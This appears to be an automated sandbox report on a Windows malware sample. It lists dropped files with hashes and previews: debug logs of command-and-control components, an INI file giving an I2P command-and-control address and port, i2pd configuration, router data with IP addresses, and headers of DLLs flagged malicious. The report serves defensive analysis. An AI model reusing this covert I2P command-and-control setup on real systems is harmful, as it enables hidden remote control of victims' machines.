SSDEEP:96:idH9NYJ9Vr3YPpYPTNYP6YPTYPcYPV30HCEEL25QLi5QLatzLH:AdNiT7+oNZonU30iEx555JtX
MD5:44C1CB5F571D1B00998284C6532036CB
SHA1:13FED5B92826C9F176AF4E692D92373B77883BF8
SHA-256:576725B7C9F9A52DD04B70BBFF36B4113B4A6574E33DB47235BFE1D5740A605B
SHA-512:037ABE6C580C2A8A283F6CDE761F69C443604C1F2987597FA42B93AD06BE58B75D5343383F043B2C93E9523E2117096A5247FC17648A6E6B19D6B88CD4C3B54A
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=c
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:Generic INItialization configuration [cnccli]
Category:dropped
Size (bytes):214
Entropy (8bit):5.0997449470012635
Encrypted:false
SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
MD5:26702FAAB91B6B144715714A96728F39
SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
Malicious:false
Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):104448
Entropy (8bit):6.259370376612282
Encrypted:false
SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
MD5:7A8E8A0842D8D65713DEE5393E806755
SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1021
Entropy (8bit):5.4433948268529315
Encrypted:false
SSDEEP:24:CFAGHS+5lGyclY7Gfy6BgT7cRE9FLxJAAJ90ERnSXYHe:CFdHS+54yclDYcm9FLPTAt
MD5:29A1D3E8E9EFDEFC3E26876DEFCDCD0A
SHA1:D8DC54939D6349A82ACFC0675F7366068661C288
SHA-256:58A0ED1204A77E2850E7A8937CFE99B6B0F9F8EFF0E28D189A26C5E84AAFD9B3
SHA-512:192EC9735A8E685D5AC5FD0C0A83892A70B84E0E6B8FFBB6AA1955334A317D327E13604CE6F73A37B216E341F4CC0ED55BAFB3F935592F07E16AE47F6FD3F533
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11ecb070)..[I] (tcp_connect) -> Done(sock=0x350,host=7
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):92672
Entropy (8bit):6.242846530333761
Encrypted:false
SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
MD5:FDCF93ACD089B505B524DDFA0FF947F9
SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):14113799
Entropy (8bit):5.189643011789023
Encrypted:false
SSDEEP:1536:JaJvcFh7unJBLgBcix2inqd6wg+E1fhXND2hghv2r7AF9mLnTeW9s4gOkmqh15hq:
MD5:49A43EEC4FA4E0D6953C9F5070E52AE2
SHA1:21E629D0D061D379361A5DB299DD4FA578A22D20
SHA-256:96240CC6EFCD86CE150431DC6AB2B550B0E6BC1CC011E46ADAE52F26F650DE66
SHA-512:63B6C0681EA11B3709787FF18BC8D5EC4062D6B223046E23A7724B58C47769A7DCD0D2C73498BB31E655F89D4396A52F23048C67DBDCBCA6A806E53055123992
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text
Category:dropped
Size (bytes):8568
Entropy (8bit):4.958673415285098
Encrypted:false
SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:27535CEE6740DFC50A78A0322415E67C
SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:false
Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):62449
Entropy (8bit):7.807149241969407
Encrypted:false
SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
MD5:688FDFAE15F328A84E8F19F8F4193AF2
SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
Malicious:false
Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):7.568437118493545
Encrypted:false
SSDEEP:12:SjrpAVPEqpr9TGiAfYFzgIMJkEYZ2m1RzmQHr6vXsmy5:SfpAEqpr9TGiAKzLPR1hmQL6/ty5
MD5:862D2AC77B87DEC89194DFE15A3D36D9
SHA1:2CAE3599AC188441CE2261BBD0EC57A5A6FFAD78
SHA-256:AD884B9930B43E1174485EF150144584D0C04F66E05029D2C6B22E767293F90F
SHA-512:3BA4115D63680F9DCEBBA994F8C53ACFCA86FAF85417BA2CB4CC5D8CDDE195084F03387249E8A93ABFF5FE7095AACBD83808434CABFAB1E1748908875225EF3B
Malicious:false
Preview:..s|....I.[.?'mX..........!...v...'n.);[..=*\.h......E.{....0..M.1..7v.2...N.JsD.W...t...R..$.ce..y...k.U."'DLp.@.T.$...../T..^..'Q(...w.?.a.d....^W.r4..2 ....u.X...5Bb....fB.........xi.=....@.v..wU . .......y.*....eT&....i...Z]Z.O.s.f....H&.@..:.].I.#6..K$.........v.T...4 .Sa..A.....(tjS..M.:(.....R)..X..`|.w.M.....Mb..(..<M....0:5...%6..*......8.{.f.k..:.R?0...>.o.D4.vf.......p&0..D. .`...p...s....h-RH............D5.0-.:eP/...A......=.jW........uU..N.\....0.{.s..CRXx9A..V
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):7.631290584404791
Encrypted:false
SSDEEP:12:foaSx9+zAHy0EBhBfVEcz/aVHrgzHNUXJgdYtNqpQaNn/pOmtINTeZJo:uxYzSlOfqSKk+oEBal/pO3ME
MD5:470FB6B5B871ACE19163EFFF78E24F2B
SHA1:DF19A5F1F9C852648E1A6B3A2D95B7CB4D7C7696
SHA-256:03C0802AD5B1D69D6FC6B1C58D15DD6A34C09BE80E81567CB35F55311EBD70C4
SHA-512:68DC0C48C196B63E06C72FE8629D1D8570E5CC549E341A2566699933A73CFA7844337BFDFDD3A354B72225790188FC43019C2D8D14824EA29EB6FDE9DF932C79
Malicious:false
Preview:X....M........].~}a..l.A.u.....c...`K.1Q....w...X.....5(7.4ild.*7.|.,}NC.I.)(...-.e..4.......m..W.K7,}.....D.......[R...../5....... ..^w-.M(....F...+..?."}......\cJ...n.}S.......Q.l..s#.(vbZ.u.9...qz.......G.l$$+...H#oc.r........k..}......A...)..... 4.bX.Lr.ET$.dP....<...."..W.M.....HO..9.....Z..:.xdo2..V?6....!.nMN..I.w.8b......X.-Y.hY(..0qTU.....W..QR.(..Ln)..c\.h....>.gkY.p.kS...0.4.C..3....&......F.F...zC.......i...E.3...(7>.$".._..e.~..I..r.faXc!.......e&Pa.../o".....".9|71l.~
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):7.541194272981684
Encrypted:false
SSDEEP:12:u312v/oO5k727M3AW5YX+RcUTvRIdQ/tOeUQoQE/DWQnP5GuPZ:u3u97M3taX+RruKtlUQXE/1Z
MD5:443DFAC59EEC72425A5FC8A46F992712
SHA1:68F69B5DB9702B259A0E6949663DA555A4EC0335
SHA-256:6BEB85B63C49F4C3141EA7E70C0BA9B3EB26C6C2DDFA85931538BB7E57369531
SHA-512:D3A28F68A413A5B8B7315EB664250DBE8AF26BFCE9EB1256061A19381B98C75BB3B0EDCA045C9E2A8F806E5E066B7090CFF92086D294D913535083EF5828E1D0
Malicious:false
Preview:L..{%..9.a.#P..... .K.)..L....aZ....X.v...JH.+......_..r{...TQ.-..... (..t.i.....Ie..4._~"..zR..BE33...+.\C..T.8..+W...2l..:."5lQ`J.)o_$...t<...O..F..Tc.....V.T}m.xPS...^.5....#.k.*..yW........Q.v.....%.....3>..q..f..sgqX.K.v.F..(J....J..=:.W.-....T..-.....HJ..m.s.%%.q.O.%~..qx..r.v.0...5..:1w..,..w.{.T...QV.[^....=<&.P....}..u.........:5Y.....:}...2..u......+mx.F.....=.C....1F.c.i.6.l. W&^oqBy....@...=..r..T".3.~...kG...r...K).U.e..]..........h.K.@./^+.T,..}9..s../..O.....#7.J.k....V
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):7.631403585207467
Encrypted:false
SSDEEP:12:DvF6Gg/6xJD9TmVYCvCtaWFn2jHxjeBgg6ufWbcU4OrDGYGqo:DBGe9gYyNhjHwBgg6u0cUR/Gx
MD5:61CE47E283BA10B012B49F3BFF2EB3CF
SHA1:96105A4F3864111BC5F4E311EFE7414928B80605
SHA-256:6D4F757C07264BBECC43243D03DB63AB18403C5FC4DD9C61517F18966A86C823
SHA-512:31CB8175C6243E353EC83E7E6A378CDA8E3441870C999449BDB8F3068B3BD7F385C2A6765F9360D17F264FD2511A0A54AEC514CDD07E24C034D0D564088FC68E
Malicious:false
Preview::......W...YY...[-.V1....BK..6...@.........DbM._~(1f.C.C..&.s....v..aA.....OF.yM0 ..'W.G..6..t.(?]...nU.{_~..w......Bm...w/]..>...B...A.g..5y."......Lm`.....d.....8...6..[.=..N.....5s..T.e'...q.3..1p.......wO...._..<".PI...1<G..b\.F...I..IV.!........q...f..qeRem.NPK[.!R....?......C.....~. ....>.1l~.....)...Z..i...B..".Yn..FB*....x..k....O....|......s.:.jt.......m%........@..t.7..Q..L....*.m..z`.7.N..du..u.8..<Zq..cp..J.N=.........H..^....@..W....}..'2..Wv..._...V.4..!..9....I
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1155
Entropy (8bit):6.739495141686378
Encrypted:false
SSDEEP:24:GSRSRSRSRSRSRSRSRSRSaOUYGtgQXgZ4UN9f7OOUQf71DJokuG:GSRSRSRSRSRSRSRSRSRSaOURgQXg+g93
MD5:6F8F01EA8277DE90F940BF058ECDD4C6
SHA1:645C0201AEA001A70F5B70449D2A10D8D22D7EC0
SHA-256:F4E35969912DFADA1D0020C1D9E33B240F4C10F1CAD52724F312E6ECDDF239FC
SHA-512:6F1C066837E39ADA2E765371DB3512E819D5A63E751EE6D8E846F032DF08B1B2D56AF18F24225A3A708E86D4F93712BDF9FD8669B8C3E02E3FA8226D4A025DCF
Malicious:false
Preview:,......\|..-..`..>...8... .W1..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..9......\.";.NA...0H..M.q.v............................NTCP2.u.host=.46.51.90.183;.i=.sNqYdn-uvUTCEUlGZEPFpQ==;.port=.12340;.s=,tWWGajlsaqYxVxh60B2L970MYtjSUGx6Rep08zXwky4=;.v=.2;..........NTCP2...host=.2a02:4540:a8:758d:1:0:4417:d64d;.i=.sNqYdn-uvUTCEUlGZEPFpQ==;.port=.12340;.s=,tWWGajlsaqYxVxh60B2L970MYtjSUGx6Rep08zXwky4=;.v=.2;..........SSU2...caps=.BC;.host=.46.51.90.183;.i=,2tyQkZvW3nmRJJ~E89JTDaaGs13umLJwW7UFzMPSJ0g=;.port=.12340;.s=,q2HWsK0AjEJiSG35jOpqPl4Rd5iFgCaiHmMznFg871Y=;.v=.2;..........SSU2...caps=.BC;.host=.2a02:4540:a8:758d:1:0:4417:d64d;.i=,2tyQkZvW3nmRJJ~E89JTDaaGs13umLJwW7UFzMPSJ0g=;.mtu=.1500;.port=.12340;.s=,q2HWsK0A
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1068
Entropy (8bit):6.6983858535009535
Encrypted:false
SSDEEP:12:KHA78hurSrJSrSrA8IQIVsO+Bu8JPQIVsa+Bf7LMI6Ng49LZPNdd:Kg4sSrkSr9yD+JH+1s+YZ5
MD5:0CAAE5B22A7B81CA38CC6EBA5B748F66
SHA1:73BC14D65F4B9974DF24087386B785AF06CD43B2
SHA-256:E842C4736337BF049E29F67FA07DB9B9DB01AEDE78E1F4DD3AEAD15CF821C3D9
SHA-512:70866BA2869BF83159CFA47C5659522BC4B659972E1EB12140BBE6DAC018A56CA94CAA73B0D3E4053A75345FB902DE24AB8B12E3558ED251226EEC46653D2ECC
Malicious:false
Preview:.......r...]iJ.R.X.....K..9...Ia.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+...W....t]i...q..11..+.....................\............NTCP2.u.host=.74.222.100.29;.i=.i5rKowaJJYoDuaArfTkf8g==;.port=.9686;.s=,1DOBhdrPlgLvEAqgKj0vUpIdvPVepje9Puu7Sim9mVg=;.v=.2;..........NTCP2.@.caps=.6;.s=,1DOBhdrPlgLvEAqgKj0vUpIdvPVepje9Puu7Sim9mVg=;.v=.2;..........SSU2...caps=.BC;.host=.74.222.100.29;.i=,rBmOKe5ZJmpwThAro6cflD1pC1TV5Q1n7Kys6zDCyk4=;.port=.9686;.s=,NDG0Wn9C5i4d3WhzAq4tBcE2K2gH6vY83pC4MZjP9m0=;.v=.2;..........SSU2.q.caps=.6;.i=,rBmOKe5ZJmpwThAro6cflD1pC1TV5Q1n7Kys6zDCyk4=;.s=,NDG0Wn9C5i4d3WhzAq4tBcE2K2gH6vY83pC4MZjP9m0=;.v=.2;..^.caps=.XfR;.netId=.2;.netdb.knownLeaseSets=.1;.netdb.knownRouters=.81;.router.version=.0.9
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):999
Entropy (8bit):6.774688234557186
Encrypted:false
SSDEEP:24:bcIZZZZZZZZZgXzb4o1wk0XnWEXFgYPrgag+:4IZZZZZZZZZgwo1wnXnWsFgMUI
MD5:5C67E4B2369A12118E057B003D714CAE
SHA1:E585DE55EFA9862293CB499B65BD4AA2C1D8ACCD
SHA-256:3731A87B380957B288F8DAE5A13168C4DCC0E753EBD1D3A134CE4147414C0702
SHA-512:AC1D398659445A8553B472375E14E7B8A6826F5D8A83FE78845027D7FC8A0BAC60E5977D4F982C7D04AB4E3A0A38886E3AF1734DE1700F43405340853C04A6AC
Malicious:false
Preview:E_...A.......\*Q%.._.......6e.X4c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....c....*.TR.)....9.v..!.....7....J..$ms.....|....8P....+.C....................p...........SSU2...caps=.B4;.i=,kysBOcWJAkuOfMZSs6oMp1NhK4UTgMXy5t1h8igFySw=;.iexp0=.1726474662;.iexp1=.1726476887;.iexp2=.1726474603;.ih0=,4lORYuNygTUYNcWUze-2W1~xgUT-tT1YrVLQ~0mvODg=;.ih1=,y~6JUuMNo1R8VlMj6oWYXqwqGTK2K~CQ-pUdlClmx7o=;.ih2=,gJ~CLfQo8XCfMMRKb0vGsqG2cMVTUsWle4FaLqOncBo=;.itag0=.1070171410;.itag1=.3358001576;.itag2=.913513486;.mtu=.1420;.s=,fHL-HWjSO-Hd7qOsgcN~LNRTFUB4mr-bd870coOsnA8=;.v=.2;..........NTCP2.@.caps=.4;.s=,Vmw02LHMH-F5GnnZbhsZqHJS-RYVGNKRaoyYztqn3jc=;.v=.2;..,.caps=.PU;.netId=.2;.router.version=.0.9.63;..&a..D?W...P....,...OCO..&gQ.x...r%.....6n.4.t2.=.}..|.....
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:OpenPGP Public Key
Category:dropped
Size (bytes):812
Entropy (8bit):6.739716455890191
Encrypted:false
SSDEEP:24:1lN16DSxPsxPsxPsxPsxPsxPsxPsxPsxPsx0UULR9Tj:nj6OxPsxPsxPsxPsxPsxPsxPsxPsxPs8
MD5:6FEA3CCC952282661986658F34488988
SHA1:3D8A7A7B6D27DAC4E3E6CCD23507996FE11949FD
SHA-256:CDD4514908075988E064C81954827045E129A6EFB072AC5377C0563A2D425454
SHA-512:7B1777A45B0AA7405E215442DE93D576F033E0AF27D06E6B8D42CD9E08CD3B2A106B1C7572E9B97719A97B92D390E23C0B1344711321869F1B62D39F0D8B678E
Malicious:false
Preview:.&.c.;.....K._T...)...0.Q....&.'.....N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U......N...i....SwQ?.p.%a.2C..'U./..........@.........j......I.........................NTCP2.w.host=.212.118.52.164;.i=.qbMIKyCC~DT9-iRpsnijSA==;.port=.26199;.s=,G1fw5fVzzVjAfAZsOP-JI504GFqOdcHbre4nztYF7mI=;.v=.2;..........SSU2...caps=.BC;.host=.212.118.52.164;.i=,WNxSvE~rW94j7boFNS90YfHDFqP85B58ZTtKrSDgK50=;.port=.26199;.s=,QSxoYzSxmKoWN1qkwhOFFUfe5ujeCgogEp0fsdYrfS8=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.59;....Qpq&m...W.E.......O...........|.W.F"..... ]...&?.L....\.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):752
Entropy (8bit):7.358588075584577
Encrypted:false
SSDEEP:12:CC+Czb9DRLZ8HlnykKi7ulIDlFRnTzxJ3ggaJTNTMXAZ0Tc17Y8cqdKhuhhzVKT+:VZzbDZknyt+DlHTVJ3gxNM40Tc17yQhh
MD5:E967B8BB9D9000DE937244167B8402C6
SHA1:4F79CB7EA6C48D0FC8F06EB0B3392E0DF1A2F5B7
SHA-256:A9C0A22796CC0D2F5989F00AFF226A9119AA571188319D620495599D94F33814
SHA-512:A8E3DC749170591875056576E45B99B8EA0CCF55DDF89A60D6EC78F2ADBBA2CF89296CB6192A8F62196527605696910999B0C521F671AD14824DF8A8F65E2E77
Malicious:false
Preview:......N..z.7.U..f. <.*..xB.[y.1E.+...n...z..o.z....M.o.w%?\.m.!.k...3j....).[...#.,7.n.)...(...Y......r..}.v..t.i.yM.+.....ad....s../k.j0......Y.o.......YiKM...1.DE.6..+>O.O.n8....g...q.pk.;..f|.&'hqZ.Y.....E....3.S.3......}......=.XC...AzX..D.t.O..O.1.JK5..q....e..T.......OO..)p:.O....gCk.-.....:..pwQ....[.Iz}...[...rJ....M..L...!....u.&.g.._..t{...pC...m...x...............SQ...........NTCP2.t.host=.76.23.63.123;.i=.92kxhVaxFHxCtVLca3B-lQ==;.port=.9917;.s=,-VWY6RqeX~JI9nNpTt8vIyjhqjdzLqSdhEkBgyDq8F0=;.v=.2;..........SSU.].caps=.BC;.host=.76.23.63.123;.key=,vaCxQmCfnxdgQgtbUgIxXOv2eOtHIamrqcDwPqJJn74=;.port=.9917;..,.caps=.PR;.netId=.2;.router.version=.0.9.54;.D..Q....j.R....}tx.Z.O...C...R.F.....2......{.qS.{.UW.u..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:OpenPGP Secret Key Version 6, Created Tue Aug 23 18:28:58 2022, Unknown Algorithm (0xc0); Secret Subkey
Category:dropped
Size (bytes):1342
Entropy (8bit):6.991922963598879
Encrypted:false
SSDEEP:24:q25LM4Klaam/NHLPCeDRd75sRLev9r2rnvybJyVzar8Vzb6SlB0:qcLaHwLqmd5gSv9W2svpr0
MD5:5F7472815776E051CE0FBC9A41C270B4
SHA1:2CE2ED3123BE03DEF5F3CB3B92FC67D8E907DB53
SHA-256:5E4CE8F08A676434345B0BCBF8D788786171BEF903D156630180A92986E6E6EB
SHA-512:5C027DD0E9FB4DC8EAB30032240DDF4D8BA08B87FA41580C530FDA0A92630D688033D49062546C0137422A2A54168BF07DB9DDE2ABF70A3F332A9EF9D3501417
Malicious:false
